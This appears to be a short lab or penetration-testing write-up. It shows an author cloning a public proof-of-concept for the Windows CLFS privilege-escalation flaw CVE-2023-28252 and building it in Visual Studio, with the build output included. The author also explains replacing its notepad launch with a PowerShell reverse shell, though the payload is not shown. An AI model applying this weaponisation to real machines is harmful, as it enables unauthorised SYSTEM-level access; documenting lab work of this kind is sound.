CVE-2023-28252
ps c:\Users\tacticalgator\source\repos> git clone https://github.com/fortra/CVE-2023-28252
Cloning into 'CVE-2023-28252'...
remote: Enumerating objects: 264, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 264 (delta 0), reused 0 (delta 0), pack-reused 261Receiving objects: 100% (264/264), 53.45 MiB | 10.59 MiB/s
receiving objects: 100% (264/264), 55.19 MiB | 7.92 MiB/s, done.
resolving deltas: 100% (74/74), doneDownloading the exploit package
the poc performs strcmp function to validate for privileges as SYSTEM, and launches notepad.exe
This part needs to be modified as I need to obtain a shell session
generating a powershell reverse shell via revshells.com
Replacing it with a PowerShell reverse shell payload
Build started...
1>------ build started: Project: clfs_eop, Configuration: Release x64 ------
1>clfs_eop.cpp
1>c:\Users\tacticalgator\source\repos\CVE-2023-28252\clfs_eop\clfs_eop.cpp(617,9): warning C4477: 'printf' : format string '% p' requires an argument of type 'void *', but variadic argument 1 has type 'UINT64'
1>c:\Users\tacticalgator\source\repos\CVE-2023-28252\clfs_eop\clfs_eop.cpp(1449,11): warning C4477: 'printf' : format string '%p' requires an argument of type 'void *', but variadic argument 1 has type 'UINT64'
1>c:\Users\tacticalgator\source\repos\CVE-2023-28252\clfs_eop\clfs_eop.cpp(1465,24): warning C4312: 'type cast': conversion from 'unsigned int' to 'UINT64 *' of greater size
1>c:\Users\tacticalgator\source\repos\CVE-2023-28252\clfs_eop\clfs_eop.cpp(1471,24): warning C4312: 'type cast': conversion from 'unsigned int' to 'UINT64 *' of greater size
1>link : /LTCG specified but no code generation required; remove /LTCG from the link command line to improve linker performance
1>clfs_eop.vcxproj -> c:\Users\tacticalgator\source\repos\CVE-2023-28252\x64\Release\clfs_eop.exe
1>Done building project "clfs_eop.vcxproj".
========== build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========Build complete